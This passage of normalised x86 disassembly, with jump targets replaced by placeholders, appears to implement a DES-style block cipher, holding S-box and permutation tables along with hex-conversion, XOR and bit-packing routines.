mov [ ebp - 0x444 ] 0x5
mov [ ebp - 0x440 ] 0xc
mov [ ebp - 0x43c ] 0xc
mov [ ebp - 0x438 ] 0xa
mov [ ebp - 0x434 ] 0x2
mov [ ebp - 0x430 ] 0x7
mov [ ebp - 0x42c ] 0x4
mov [ ebp - 0x428 ] 0xe
mov [ ebp - 0x424 ] 0x8
mov [ ebp - 0x420 ] 0x2
mov [ ebp - 0x41c ] 0xf
mov [ ebp - 0x418 ] 0x9
mov [ ebp - 0x414 ] 0x4
mov [ ebp - 0x410 ] 0xe
mov [ ebp - 0x40c ] 0x2
mov [ ebp - 0x408 ] 0xe
mov [ ebp - 0x404 ] 0x4
mov [ ebp - 0x400 ] 0xb
mov [ ebp - 0x3fc ] 0xc
mov [ ebp - 0x3f8 ] 0xb
mov [ ebp - 0x3f4 ] 0x2
mov [ ebp - 0x3f0 ] 0x8
mov [ ebp - 0x3ec ] 0x4
mov [ ebp - 0x3e8 ] 0x2
mov [ ebp - 0x3e4 ] 0x1
mov [ ebp - 0x3e0 ] 0xc
mov [ ebp - 0x3dc ] 0x1
mov [ ebp - 0x3d8 ] 0xc
mov [ ebp - 0x3d4 ] 0xb
mov [ ebp - 0x3d0 ] 0x7
mov [ ebp - 0x3cc ] 0x7
mov [ ebp - 0x3c8 ] 0x4
mov [ ebp - 0x3c4 ] 0xa
mov [ ebp - 0x3c0 ] 0x1
mov [ ebp - 0x3bc ] 0xa
mov [ ebp - 0x3b8 ] 0x7
mov [ ebp - 0x3b4 ] 0xd
mov [ ebp - 0x3b0 ] 0xe
mov [ ebp - 0x3ac ] 0xb
mov [ ebp - 0x3a8 ] 0xd
mov [ ebp - 0x3a4 ] 0x7
mov [ ebp - 0x3a0 ] 0x2
mov [ ebp - 0x39c ] 0x6
mov [ ebp - 0x398 ] 0x1
mov [ ebp - 0x394 ] 0x8
mov [ ebp - 0x390 ] 0xd
mov [ ebp - 0x38c ] 0x8
mov [ ebp - 0x388 ] 0x5
mov [ ebp - 0x384 ] 0xf
mov [ ebp - 0x380 ] 0x6
mov [ ebp - 0x37c ] 0x5
mov [ ebp - 0x378 ] 0x0
mov [ ebp - 0x374 ] 0x9
mov [ ebp - 0x370 ] 0xf
mov [ ebp - 0x36c ] 0x3
mov [ ebp - 0x368 ] 0xf
mov [ ebp - 0x364 ] 0xc
mov [ ebp - 0x360 ] 0x0
mov [ ebp - 0x35c ] 0xf
mov [ ebp - 0x358 ] 0xa
mov [ ebp - 0x354 ] 0x5
mov [ ebp - 0x350 ] 0x9
mov [ ebp - 0x34c ] 0xd
mov [ ebp - 0x348 ] 0x3
mov [ ebp - 0x344 ] 0x6
mov [ ebp - 0x340 ] 0xa
mov [ ebp - 0x33c ] 0x0
mov [ ebp - 0x338 ] 0x9
mov [ ebp - 0x334 ] 0x3
mov [ ebp - 0x330 ] 0x4
mov [ ebp - 0x32c ] 0xe
mov [ ebp - 0x328 ] 0x8
mov [ ebp - 0x324 ] 0x0
mov [ ebp - 0x320 ] 0x5
mov [ ebp - 0x31c ] 0x9
mov [ ebp - 0x318 ] 0x6
mov [ ebp - 0x314 ] 0xe
mov [ ebp - 0x310 ] 0x3
mov [ ebp - 0x30c ] 0xc
mov [ ebp - 0x308 ] 0xa
mov [ ebp - 0x304 ] 0x9
mov [ ebp - 0x300 ] 0x4
mov [ ebp - 0x2fc ] 0x1
mov [ ebp - 0x2f8 ] 0xf
mov [ ebp - 0x2f4 ] 0xe
mov [ ebp - 0x2f0 ] 0x3
mov [ ebp - 0x2ec ] 0xa
mov [ ebp - 0x2e8 ] 0x4
mov [ ebp - 0x2e4 ] 0xf
mov [ ebp - 0x2e0 ] 0x2
mov [ ebp - 0x2dc ] 0xf
mov [ ebp - 0x2d8 ] 0x2
mov [ ebp - 0x2d4 ] 0x5
mov [ ebp - 0x2d0 ] 0xc
mov [ ebp - 0x2cc ] 0x9
mov [ ebp - 0x2c8 ] 0x7
mov [ ebp - 0x2c4 ] 0x2
mov [ ebp - 0x2c0 ] 0x9
mov [ ebp - 0x2bc ] 0x2
mov [ ebp - 0x2b8 ] 0xc
mov [ ebp - 0x2b4 ] 0x8
mov [ ebp - 0x2b0 ] 0x5
mov [ ebp - 0x2ac ] 0x6
mov [ ebp - 0x2a8 ] 0x9
mov [ ebp - 0x2a4 ] 0xc
mov [ ebp - 0x2a0 ] 0xf
mov [ ebp - 0x29c ] 0x8
mov [ ebp - 0x298 ] 0x5
mov [ ebp - 0x294 ] 0x3
mov [ ebp - 0x290 ] 0xa
mov [ ebp - 0x28c ] 0x0
mov [ ebp - 0x288 ] 0x6
mov [ ebp - 0x284 ] 0x7
mov [ ebp - 0x280 ] 0xb
mov [ ebp - 0x27c ] 0xd
mov [ ebp - 0x278 ] 0x1
mov [ ebp - 0x274 ] 0x0
mov [ ebp - 0x270 ] 0xe
mov [ ebp - 0x26c ] 0x3
mov [ ebp - 0x268 ] 0xd
mov [ ebp - 0x264 ] 0x4
mov [ ebp - 0x260 ] 0x1
mov [ ebp - 0x25c ] 0x4
mov [ ebp - 0x258 ] 0xe
mov [ ebp - 0x254 ] 0xa
mov [ ebp - 0x250 ] 0x7
mov [ ebp - 0x24c ] 0xe
mov [ ebp - 0x248 ] 0x0
mov [ ebp - 0x244 ] 0x1
mov [ ebp - 0x240 ] 0x6
mov [ ebp - 0x23c ] 0x7
mov [ ebp - 0x238 ] 0xb
mov [ ebp - 0x234 ] 0xd
mov [ ebp - 0x230 ] 0x0
mov [ ebp - 0x22c ] 0x5
mov [ ebp - 0x228 ] 0x3
mov [ ebp - 0x224 ] 0xb
mov [ ebp - 0x220 ] 0x8
mov [ ebp - 0x21c ] 0xb
mov [ ebp - 0x218 ] 0x8
mov [ ebp - 0x214 ] 0x6
mov [ ebp - 0x210 ] 0xd
mov [ ebp - 0x20c ] 0x4
mov [ ebp - 0x208 ] 0xd
mov [ ebp - 0x204 ] 0x1
mov [ ebp - 0x200 ] 0x6
mov [ ebp - 0x1fc ] 0xb
mov [ ebp - 0x1f8 ] 0x0
mov [ ebp - 0x1f4 ] 0x4
mov [ ebp - 0x1f0 ] 0xb
mov [ ebp - 0x1ec ] 0x2
mov [ ebp - 0x1e8 ] 0xb
mov [ ebp - 0x1e4 ] 0xb
mov [ ebp - 0x1e0 ] 0xd
mov [ ebp - 0x1dc ] 0xe
mov [ ebp - 0x1d8 ] 0x7
mov [ ebp - 0x1d4 ] 0xd
mov [ ebp - 0x1d0 ] 0x8
mov [ ebp - 0x1cc ] 0xf
mov [ ebp - 0x1c8 ] 0x4
mov [ ebp - 0x1c4 ] 0xc
mov [ ebp - 0x1c0 ] 0x1
mov [ ebp - 0x1bc ] 0x0
mov [ ebp - 0x1b8 ] 0x9
mov [ ebp - 0x1b4 ] 0x3
mov [ ebp - 0x1b0 ] 0x4
mov [ ebp - 0x1ac ] 0x8
mov [ ebp - 0x1a8 ] 0x1
mov [ ebp - 0x1a4 ] 0x7
mov [ ebp - 0x1a0 ] 0xa
mov [ ebp - 0x19c ] 0xd
mov [ ebp - 0x198 ] 0xa
mov [ ebp - 0x194 ] 0xe
mov [ ebp - 0x190 ] 0x7
mov [ ebp - 0x18c ] 0x3
mov [ ebp - 0x188 ] 0xe
mov [ ebp - 0x184 ] 0xa
mov [ ebp - 0x180 ] 0x9
mov [ ebp - 0x17c ] 0xc
mov [ ebp - 0x178 ] 0x3
mov [ ebp - 0x174 ] 0xf
mov [ ebp - 0x170 ] 0x5
mov [ ebp - 0x16c ] 0x9
mov [ ebp - 0x168 ] 0x5
mov [ ebp - 0x164 ] 0x6
mov [ ebp - 0x160 ] 0x0
mov [ ebp - 0x15c ] 0x7
mov [ ebp - 0x158 ] 0xc
mov [ ebp - 0x154 ] 0x8
mov [ ebp - 0x150 ] 0xf
mov [ ebp - 0x14c ] 0x5
mov [ ebp - 0x148 ] 0x2
mov [ ebp - 0x144 ] 0x0
mov [ ebp - 0x140 ] 0xe
mov [ ebp - 0x13c ] 0xa
mov [ ebp - 0x138 ] 0xf
mov [ ebp - 0x134 ] 0x5
mov [ ebp - 0x130 ] 0x2
mov [ ebp - 0x12c ] 0x6
mov [ ebp - 0x128 ] 0x8
mov [ ebp - 0x124 ] 0x9
mov [ ebp - 0x120 ] 0x3
mov [ ebp - 0x11c ] 0x1
mov [ ebp - 0x118 ] 0x6
mov [ ebp - 0x114 ] 0x2
mov [ ebp - 0x110 ] 0xc
mov [ ebp - 0x10c ] 0xd
mov [ ebp - 0x108 ] 0x1
mov [ ebp - 0x104 ] 0x7
mov [ ebp - 0x100 ] 0x2
mov [ ebp - 0xfc ] 0x2
mov [ ebp - 0xf8 ] 0xf
mov [ ebp - 0xf4 ] 0xb
mov [ ebp - 0xf0 ] 0x1
mov [ ebp - 0xec ] 0x8
mov [ ebp - 0xe8 ] 0xd
mov [ ebp - 0xe4 ] 0x4
mov [ ebp - 0xe0 ] 0xe
mov [ ebp - 0xdc ] 0x4
mov [ ebp - 0xd8 ] 0x8
mov [ ebp - 0xd4 ] 0x1
mov [ ebp - 0xd0 ] 0x7
mov [ ebp - 0xcc ] 0x6
mov [ ebp - 0xc8 ] 0xa
mov [ ebp - 0xc4 ] 0x9
mov [ ebp - 0xc0 ] 0x4
mov [ ebp - 0xbc ] 0xf
mov [ ebp - 0xb8 ] 0x3
mov [ ebp - 0xb4 ] 0xc
mov [ ebp - 0xb0 ] 0xa
mov [ ebp - 0xac ] 0xb
mov [ ebp - 0xa8 ] 0x7
mov [ ebp - 0xa4 ] 0xe
mov [ ebp - 0xa0 ] 0x8
mov [ ebp - 0x9c ] 0x1
mov [ ebp - 0x98 ] 0x4
mov [ ebp - 0x94 ] 0x2
mov [ ebp - 0x90 ] 0xd
mov [ ebp - 0x8c ] 0xa
mov [ ebp - 0x88 ] 0xc
mov [ ebp - 0x84 ] 0x0
mov [ ebp - 0x80 ] 0xf
mov [ ebp - 0x7c ] 0x9
mov [ ebp - 0x78 ] 0x5
mov [ ebp - 0x74 ] 0x6
mov [ ebp - 0x70 ] 0xc
mov [ ebp - 0x6c ] 0x3
mov [ ebp - 0x68 ] 0x6
mov [ ebp - 0x64 ] 0xa
mov [ ebp - 0x60 ] 0x9
mov [ ebp - 0x5c ] 0xe
mov [ ebp - 0x58 ] 0xb
mov [ ebp - 0x54 ] 0xd
mov [ ebp - 0x50 ] 0x0
mov [ ebp - 0x4c ] 0x5
mov [ ebp - 0x48 ] 0x0
mov [ ebp - 0x44 ] 0xf
mov [ ebp - 0x40 ] 0x3
mov [ ebp - 0x3c ] 0x0
mov [ ebp - 0x38 ] 0xe
mov [ ebp - 0x34 ] 0x3
mov [ ebp - 0x30 ] 0x5
mov [ ebp - 0x2c ] 0xc
mov [ ebp - 0x28 ] 0x9
mov [ ebp - 0x24 ] 0x5
mov [ ebp - 0x20 ] 0x6
mov [ ebp - 0x1c ] 0x7
mov [ ebp - 0x18 ] 0x2
mov [ ebp - 0x14 ] 0x8
mov [ ebp - 0x10 ] 0xb
mov [ ebp - 0x810 ] 0x0
jmp r-xdata
cmp [ ebp - 0x810 ] 0x8
jge r-xdata
mov esp ebp
pop ebp
retn
mov ecx [ ebp - 0x810 ]
imul ecx ecx 0x6
mov edx [ ebp + 0x8 ]
movsx eax [ edx + ecx + 0x4 ]
mov ecx [ ebp - 0x810 ]
imul ecx ecx 0x6
mov edx [ ebp + 0x8 ]
movsx ecx [ edx + ecx + 0x3 ]
lea edx [ eax + ecx * 2 ]
mov eax [ ebp - 0x810 ]
imul eax eax 0x6
mov ecx [ ebp + 0x8 ]
movsx eax [ ecx + eax + 0x2 ]
lea ecx [ edx + eax * 4 ]
mov edx [ ebp - 0x810 ]
imul edx edx 0x6
mov eax [ ebp + 0x8 ]
movsx edx [ eax + edx + 0x1 ]
lea eax [ ecx + edx * 8 ]
mov [ ebp - 0x4 ] eax
mov ecx [ ebp - 0x810 ]
imul ecx ecx 0x6
mov edx [ ebp + 0x8 ]
movsx eax [ edx + ecx + 0x5 ]
mov ecx [ ebp - 0x810 ]
imul ecx ecx 0x6
mov edx [ ebp + 0x8 ]
movsx ecx [ edx + ecx ]
lea edx [ eax + ecx * 2 ]
mov [ ebp - 0xc ] edx
mov eax [ ebp - 0x810 ]
shl eax 0x8
lea ecx [ ebp + eax - 0x80c ]
mov edx [ ebp - 0x4 ]
shl edx 0x4
add ecx edx
mov eax [ ebp - 0xc ]
mov ecx [ ecx + eax * 4 ]
mov [ ebp - 0x8 ] ecx
mov [ ebp - 0x814 ] 0x0
jmp r-xdata
cmp [ ebp - 0x814 ] 0x4
jge r-xdata
jmp r-xdata
mov ecx 0x3
sub ecx [ ebp - 0x814 ]
mov eax [ ebp - 0x8 ]
sar eax cl
and eax 0x1
mov ecx [ ebp - 0x810 ]
mov edx [ ebp + 0xc ]
lea ecx [ edx + ecx * 4 ]
mov edx [ ebp - 0x814 ]
mov [ ecx + edx ] al
jmp r-xdata
mov eax [ ebp - 0x810 ]
add eax 0x1
mov [ ebp - 0x810 ] eax
mov edx [ ebp - 0x814 ]
add edx 0x1
mov [ ebp - 0x814 ] edx
sub_403210
push ebp
mov ebp esp
sub esp 0xa4
mov [ ebp - 0xa0 ] 0x10
mov [ ebp - 0x9c ] 0x7
mov [ ebp - 0x98 ] 0x14
mov [ ebp - 0x94 ] 0x15
mov [ ebp - 0x90 ] 0x1d
mov [ ebp - 0x8c ] 0xc
mov [ ebp - 0x88 ] 0x1c
mov [ ebp - 0x84 ] 0x11
mov [ ebp - 0x80 ] 0x1
mov [ ebp - 0x7c ] 0xf
mov [ ebp - 0x78 ] 0x17
mov [ ebp - 0x74 ] 0x1a
mov [ ebp - 0x70 ] 0x5
mov [ ebp - 0x6c ] 0x12
mov [ ebp - 0x68 ] 0x1f
mov [ ebp - 0x64 ] 0xa
mov [ ebp - 0x60 ] 0x2
mov [ ebp - 0x5c ] 0x8
mov [ ebp - 0x58 ] 0x18
mov [ ebp - 0x54 ] 0xe
mov [ ebp - 0x50 ] 0x20
mov [ ebp - 0x4c ] 0x1b
mov [ ebp - 0x48 ] 0x3
mov [ ebp - 0x44 ] 0x9
mov [ ebp - 0x40 ] 0x13
mov [ ebp - 0x3c ] 0xd
mov [ ebp - 0x38 ] 0x1e
mov [ ebp - 0x34 ] 0x6
mov [ ebp - 0x30 ] 0x16
mov [ ebp - 0x2c ] 0xb
mov [ ebp - 0x28 ] 0x4
mov [ ebp - 0x24 ] 0x19
mov [ ebp - 0xa4 ] 0x0
jmp r-xdata
cmp [ ebp - 0xa4 ] 0x20
jge r-xdata
mov [ ebp - 0xa4 ] 0x0
jmp r-xdata
mov ecx [ ebp - 0xa4 ]
mov edx [ ebp + ecx * 4 - 0xa0 ]
mov eax [ ebp - 0xa4 ]
mov ecx [ ebp + 0x8 ]
mov dl [ ecx + edx - 0x1 ]
mov [ ebp + eax - 0x20 ] dl
jmp r-xdata
cmp [ ebp - 0xa4 ] 0x20
jge r-xdata
mov eax [ ebp - 0xa4 ]
add eax 0x1
mov [ ebp - 0xa4 ] eax
mov esp ebp
pop ebp
retn
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0xa4 ]
mov edx [ ebp - 0xa4 ]
mov al [ ebp + edx - 0x20 ]
mov [ ecx ] al
jmp r-xdata
mov eax [ ebp - 0xa4 ]
add eax 0x1
mov [ ebp - 0xa4 ] eax
sub_403394
push ebp
mov ebp esp
push ecx
mov [ ebp - 0x4 ] 0x0
jmp r-xdata
cmp [ ebp - 0x4 ] 0x10
jge r-xdata
mov ecx [ ebp + 0x10 ]
mov [ ecx + 0x10 ] 0x0
mov esp ebp
pop ebp
retn
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0x4 ]
movsx edx [ ecx ]
cmp edx 0x39
jle r-xdata
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x4 ]
movsx ecx [ eax ]
sub ecx 0x30
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x4 ]
mov [ edx ] cl
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x4 ]
movsx ecx [ eax ]
sub ecx 0x57
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x4 ]
mov [ edx ] cl
jmp r-xdata
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x4 ]
movsx eax [ edx ]
sub eax 0x30
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x4 ]
mov [ ecx ] al
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x4 ]
movsx eax [ edx ]
sub eax 0x57
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x4 ]
mov [ ecx ] al
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x4 ]
movsx ecx [ eax ]
cmp ecx 0x39
jle r-xdata
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x4 ]
movsx edx [ ecx ]
add edx 0x57
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0x4 ]
mov [ eax ] dl
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x4 ]
movsx edx [ ecx ]
add edx 0x30
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0x4 ]
mov [ eax ] dl
jmp r-xdata
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x4 ]
movsx eax [ edx ]
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x4 ]
movsx edx [ ecx ]
xor eax edx
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x4 ]
mov [ ecx ] al
mov edx [ ebp + 0x10 ]
add edx [ ebp - 0x4 ]
movsx eax [ edx ]
cmp eax 0xa
jge r-xdata
mov eax [ ebp - 0x4 ]
add eax 0x1
mov [ ebp - 0x4 ] eax
jmp r-xdata
sub_403488
push ebp
mov ebp esp
sub esp 0x10
mov [ ebp - 0x8 ] 0x0
mov [ ebp - 0xc ] 0x0
mov esp ebp
pop ebp
retn
mov [ ebp - 0x4 ] 0x0
mov [ ebp - 0x10 ] 0x0
jmp r-xdata
cmp [ ebp - 0x10 ] 0x4
jge r-xdata
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x8 ]
mov dl [ ebp - 0x4 ]
mov [ ecx ] dl
mov eax [ ebp - 0x8 ]
add eax 0x1
mov [ ebp - 0x8 ] eax
mov ecx [ ebp - 0xc ]
add ecx 0x4
mov [ ebp - 0xc ] ecx
jmp r-xdata
mov edx [ ebp - 0xc ]
add edx [ ebp - 0x10 ]
mov eax [ ebp + 0xc ]
movsx ecx [ eax + edx ]
mov edx [ ebp - 0x4 ]
lea eax [ ecx + edx * 2 ]
mov [ ebp - 0x4 ] eax
jmp r-xdata
mov eax [ ebp - 0xc ]
cmp eax [ ebp + 0x8 ]
jge r-xdata
mov ecx [ ebp - 0x10 ]
add ecx 0x1
mov [ ebp - 0x10 ] ecx
sub_4034fe
push ebp
mov ebp esp
sub esp 0x10
mov [ ebp - 0x8 ] 0x0
mov [ ebp - 0xc ] 0x0
mov esp ebp
pop ebp
retn
mov [ ebp - 0x4 ] 0x0
mov [ ebp - 0x10 ] 0x0
jmp r-xdata
cmp [ ebp - 0x10 ] 0x4
jge r-xdata
mov ecx [ ebp + 0x10 ]
add ecx [ ebp - 0x8 ]
mov dl [ ebp - 0x4 ]
mov [ ecx ] dl
mov eax [ ebp - 0x8 ]
add eax 0x1
mov [ ebp - 0x8 ] eax
mov ecx [ ebp - 0xc ]
add ecx 0x4
mov [ ebp - 0xc ] ecx
jmp r-xdata
mov edx [ ebp - 0xc ]
add edx [ ebp - 0x10 ]
mov eax [ ebp + 0xc ]
movsx ecx [ eax + edx ]
mov edx [ ebp - 0x4 ]
lea eax [ ecx + edx * 2 ]
mov [ ebp - 0x4 ] eax
jmp r-xdata
mov eax [ ebp - 0xc ]
cmp eax [ ebp + 0x8 ]
jge r-xdata
mov ecx [ ebp - 0x10 ]
add ecx 0x1
mov [ ebp - 0x10 ] ecx
sub_403574
push ebp
mov ebp esp
sub esp 0x990
push esi
mov [ ebp - 0x910 ] 0x0
cmp [ ebp - 0x910 ] 0x10
jne r-xdata
mov edx [ ebp - 0x910 ]
add edx 0x1
mov [ ebp - 0x910 ] edx
jmp r-xdata
cmp [ ebp - 0x910 ] 0xe
jne r-xdata
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x910 ]
movsx ecx [ eax ]
test ecx ecx
je r-xdata
lea eax [ ebp - 0x5a8 ]
push eax
lea ecx [ ebp - 0x28c ]
push ecx
lea edx [ ebp - 0x670 ]
push edx
call sub_4015b8
add esp 0xc
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
cmp [ ebp - 0x674 ] 0x10
jge r-xdata
cmp [ ebp - 0x674 ] 0x10
jge r-xdata
cmp [ ebp - 0x674 ] 0xe
jge r-xdata
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x674 ]
movsx edx [ ecx ]
cmp edx 0x39
jg r-xdata
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov ecx [ ebp - 0x674 ]
mov edx [ ecx * 4 + rw-data ]
push edx
push 0x1c
lea eax [ ebp - 0x5a8 ]
push eax
lea ecx [ ebp - 0x28c ]
push ecx
call sub_4017f6
add esp 0x10
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov [ ebp - 0x910 ] 0x0
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x674 ]
movsx ecx [ eax ]
cmp ecx 0x39
jg r-xdata
cmp [ ebp - 0x674 ] 0x10
jge r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x674 ]
movsx ecx [ eax ]
sub ecx 0x57
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x674 ]
mov [ edx ] cl
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x674 ]
mov cl [ eax ]
sub cl 0x30
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x674 ]
mov [ edx ] cl
jmp r-xdata
cmp [ ebp - 0x674 ] 0x10
jge r-xdata
cmp [ ebp - 0x6c8 ] 0x1c
jge r-xdata
cmp [ ebp - 0x674 ] 0x40
jge r-xdata
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x674 ]
movsx eax [ edx ]
sub eax 0x57
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x674 ]
mov [ ecx ] al
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x674 ]
mov al [ edx ]
sub al 0x30
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x674 ]
mov [ ecx ] al
jmp r-xdata
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x674 ]
add eax 0x1
mov [ ebp - 0x674 ] eax
jmp r-xdata
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0x674 ]
movsx eax [ edx ]
cmp eax 0x39
jg r-xdata
lea eax [ ebp - 0x5d8 ]
push eax
lea ecx [ ebp - 0x610 ]
push ecx
call sub_4019a3
add esp 0x8
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x6c8 ]
mov ecx [ ebp - 0x6c8 ]
mov dl [ ebp + ecx - 0x28c ]
mov [ ebp + eax - 0x610 ] dl
mov eax [ ebp - 0x6c8 ]
mov ecx [ ebp - 0x6c8 ]
mov dl [ ebp + ecx - 0x5a8 ]
mov [ ebp + eax - 0x5f4 ] dl
jmp r-xdata
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x674 ]
mov [ ebp + eax - 0x670 ] 0x0
jmp r-xdata
mov edx [ ebp - 0x674 ]
add edx 0x1
mov [ ebp - 0x674 ] edx
jmp r-xdata
cmp [ ebp - 0x6c8 ] 0x4
jge r-xdata
cmp [ ebp - 0x674 ] 0x10
jge r-xdata
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0x674 ]
movsx edx [ ecx ]
sub edx 0x57
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x674 ]
mov [ eax ] dl
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0x674 ]
mov dl [ ecx ]
sub dl 0x30
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x674 ]
mov [ eax ] dl
jmp r-xdata
cmp [ ebp - 0x6c8 ] 0x30
jge r-xdata
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
cmp [ ebp - 0x674 ] 0xe
jge r-xdata
mov edx [ ebp - 0x674 ]
add edx 0x1
mov [ ebp - 0x674 ] edx
jmp r-xdata
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x674 ]
movsx eax [ edx ]
mov ecx 0x3
sub ecx [ ebp - 0x6c8 ]
sar eax cl
and eax 0x1
mov ecx [ ebp - 0x674 ]
mov edx [ ebp - 0x6c8 ]
lea ecx [ edx + ecx * 4 ]
mov [ ebp + ecx - 0x670 ] al
jmp r-xdata
lea ecx [ ebp - 0x990 ]
push ecx
call sub_401000
add esp 0x4
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov ecx [ ebp - 0x674 ]
add ecx 0x1
mov [ ebp - 0x674 ] ecx
jmp r-xdata
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x674 ]
imul eax eax 0x30
lea ecx [ ebp + eax - 0x58c ]
mov edx [ ebp - 0x6c8 ]
mov eax [ ebp - 0x6c8 ]
mov al [ ebp + eax - 0x5d8 ]
mov [ ecx + edx ] al
jmp r-xdata
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x674 ]
add eax 0x1
mov [ ebp - 0x674 ] eax
mov ecx [ ebp - 0x6c8 ]
add ecx 0x1
mov [ ebp - 0x6c8 ] ecx
cmp [ ebp - 0x674 ] 0x20
jge r-xdata
cmp [ ebp - 0x6c8 ] 0x4
jge r-xdata
cmp [ ebp - 0x6c8 ] 0x6
jge r-xdata
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
cmp [ ebp - 0x6c8 ] 0x4
jge r-xdata
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x674 ]
mov ecx [ ebp - 0x674 ]
mov dl [ ebp + ecx - 0x990 ]
mov [ ebp + eax - 0x90c ] dl
mov eax [ ebp - 0x674 ]
mov ecx [ ebp - 0x674 ]
mov dl [ ebp + ecx - 0x970 ]
mov [ ebp + eax - 0x270 ] dl
jmp r-xdata
jmp r-xdata
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x674 ]
movsx edx [ eax ]
mov ecx 0x3
sub ecx [ ebp - 0x6c8 ]
sar edx cl
and edx 0x1
mov eax [ ebp - 0x674 ]
mov ecx [ ebp - 0x6c8 ]
lea eax [ ecx + eax * 4 ]
mov [ ebp + eax - 0x990 ] dl
jmp r-xdata
jmp r-xdata
mov edx [ ebp + 0xc ]
add edx [ ebp - 0x6c8 ]
mov [ edx ] 0x0
mov [ ebp - 0x6cc ] 0x0
jmp r-xdata
jmp r-xdata
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x674 ]
movsx edx [ eax ]
mov ecx 0x3
sub ecx [ ebp - 0x6c8 ]
sar edx cl
and edx 0x1
mov eax [ ebp - 0x674 ]
mov ecx [ ebp - 0x6c8 ]
lea eax [ ecx + eax * 4 ]
add eax [ ebp - 0x910 ]
mov [ ebp + eax - 0x670 ] dl
mov ecx [ ebp - 0x674 ]
mov edx [ ebp - 0x6c8 ]
lea eax [ edx + ecx * 4 + 0x1 ]
cdq
mov ecx 0x7
idiv ecx
test edx edx
jne r-xdata
cmp [ ebp - 0x674 ] 0x10
jge r-xdata
mov edx [ ebp - 0x674 ]
add edx 0x1
mov [ ebp - 0x674 ] edx
mov ecx [ ebp - 0x674 ]
add ecx 0x1
mov [ ebp - 0x674 ] ecx
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
mov eax [ ebp - 0x674 ]
add eax 0x1
mov [ ebp - 0x674 ] eax
cmp [ ebp - 0x6cc ] 0x8
jge r-xdata
mov ecx [ ebp - 0x674 ]
add ecx 0x1
mov [ ebp - 0x674 ] ecx
jmp r-xdata
mov edx [ ebp - 0x910 ]
add edx 0x1
mov [ ebp - 0x910 ] edx
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
lea ecx [ ebp - 0x6c4 ]
push ecx
mov edx [ ebp - 0x674 ]
shl edx 0x5
lea eax [ ebp + edx - 0x270 ]
push eax
call sub_401b75
add esp 0x8
mov [ ebp - 0x6c8 ] 0x0
jmp r-xdata
jmp r-xdata
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0x6c8 ]
movsx edx [ ecx ]
shl edx 0x1
mov eax [ ebp - 0x6c8 ]
mov ecx [ ebp - 0x6cc ]
lea eax [ ecx + eax * 8 ]
movsx ecx [ ebp + eax - 0x5d8 ]
or edx ecx
mov eax [ ebp + 0xc ]
add eax [ ebp - 0x6c8 ]
mov [ eax ] dl
jmp r-xdata
mov edx [ ebp - 0x6c8 ]
add edx 0x1
mov [ ebp - 0x6c8 ] edx
cmp [ ebp - 0x674 ] 0x20
jge r-xdata
cmp [ ebp - 0x6c8 ] 0x8
jge r-xdata
mov ecx [ ebp - 0x6c8 ]
add ecx 0x1
mov [ ebp - 0x6c8 ] ecx
mov eax [ ebp - 0x6cc ]
add eax 0x1
mov [ ebp - 0x6cc ] eax
mov [ ebp - 0x674 ] 0x0
jmp r-xdata
